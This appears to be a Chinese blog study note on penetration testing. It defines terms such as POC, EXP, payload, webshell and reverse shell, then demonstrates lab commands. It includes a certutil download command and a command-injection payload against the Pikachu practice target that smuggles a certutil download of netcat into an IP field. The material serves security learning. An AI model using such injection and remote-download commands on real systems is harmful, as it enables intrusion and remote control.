一、名词解释
- 渗透测试:渗透测试,是为了证明网络防御按照预期计划正常运行而提供的一种机制。渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。
- 漏洞:漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,从而可以使攻击者能够在未授权的情况下访问或破坏系统。
- 代码:代码(code)是程序员用开发工具所支持的语言写出来的源文件,是一组由字符、符号或信号码元以离散形式表示信息的明确的规则体系。
- 前后端:对于web前端来说,通常是指网站的前台部分,包括网站的表现层和结构层:Web页面的结构、Web的外观视觉表现以及Web层面的交互实现;后端是在后台工作的,控制着前端的内容,主要负责程序设计架构思想,管理数据库等。后端更多的是与数据库进行交互以处理相应的业务逻辑,需要考虑的是如何实现功能、数据的存取、平台的稳定性与性能等,涉及动态语言如PHP、ASP、JSP等。
- POC:全称 ’ Proof of Concept ',中文 ’ 概念验证 ’ ,常指一段漏洞证明的代码。
- EXP:全称 ’ Exploit ',中文 ’ 利用 ',指利用系统漏洞进行攻击的动作。
注意:POC/EXP:POC是用来证明漏洞存在的,EXP是用来利用漏洞的,两者通常不是一类,或者说,PoC通常是无害的,Exp通常是有害的,有了POC,才有EXP。
- Payload:中文 ’ 有效载荷
',指成功exploit之后,真正在目标系统执行的代码或指令。Payload有很多种,它可以是Shellcode,也可以直接是一段系统命令。同一个Payload可以用于多个漏洞,但每个漏洞都有其自己的EXP,也就是说不存在通用的EXP。 - Shellcode:简单翻译 ’ shell代码
',是Payload的一种,由于其建立正向/反向shell而得名。Shellcode有很多种,包括正向的,反向的,甚至meterpreter。 - 后门:后门,本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。
- Webshell:webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。
- 木马/病毒:木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合,对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性,可以根据黑客意图突然发起攻击。
- 反弹SHELL:反弹shell(reverse
shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse
shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 - 回显:就是显示正在执行的批处理命令及执行的结果等。
- 跳板:跳板,简单来说,就是为了隐藏自己的地址,让别人无法查找到自己的位置。
- 黑白盒测试:黑盒测试又称为功能测试、数据驱动测试或基于规格说明书的测试,是一种从用户观点出发的测试。测试人员一般把被测程序当作一个黑盒子。白盒测试也称为结构测试或逻辑驱动测试,是针对被测单元内部是如何进行工作的测试。
- 暴力破解:通过利用大量猜测和穷举的方式来尝试获取用户口令的攻击方式。就是猜口令咯,攻击者一直枚举进行请求,通过对比数据包的长度可以很好的判断是否爆破成功,因为爆破成功和失败的长度是不一样的,所以可以很好的判断是否爆破成功。
- 社会工程学:建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题。
撞库:撞库是黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。 - ATT&CK:ATT&CK 是指 Adversarial Tactics, Techniques, and Common
Knowledges 。从名字中就能看出,他不是一项技术,而是更加底层“知识库”的基础资源。ATT&CK
将真实环境中使用到的对抗技术,组织成了一套策略。他关注的不是单点的IOC,而是 IOC 处于攻击过程中的上下文。
二、操作系统
- 用途
个人计算机:台式机、笔记本、微型计算机(联想、戴尔、惠普、外星人等众多品牌)
服务器用机:1U、2U服务器(量子、DELL、国产麒麟等型号) - 命令
Windows&Linux常见命令
(1) linux命令
渗透测试中常用的linux命令
(2) cmd命令
常用的cmd命令
(3) powershell
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 - 权限
文件权限&服务权限&用户权限等 - 用户
系统用户&用户组&服务用户等分类 - 防火墙
自带防火墙出站&入站规则策略协议
三、文件下载
eg: 使用Windows cmd 下载文件:
certutil.exe -urlcache -split -f http://10.10.26.191:80/靶场环境,欢迎访问,请勿修改内容.txt 靶场环境,欢迎访问,请勿修改内容.txt
查看当前文件夹是否已经下载成功
四、反弹命令
利用靶场环境Pikachu 远程命令/代码执行漏洞演示:
首先下载win版的nc命令
127.0.0.1 &certutil.exe -urlcache -split -f https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip nc.zip
4573
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
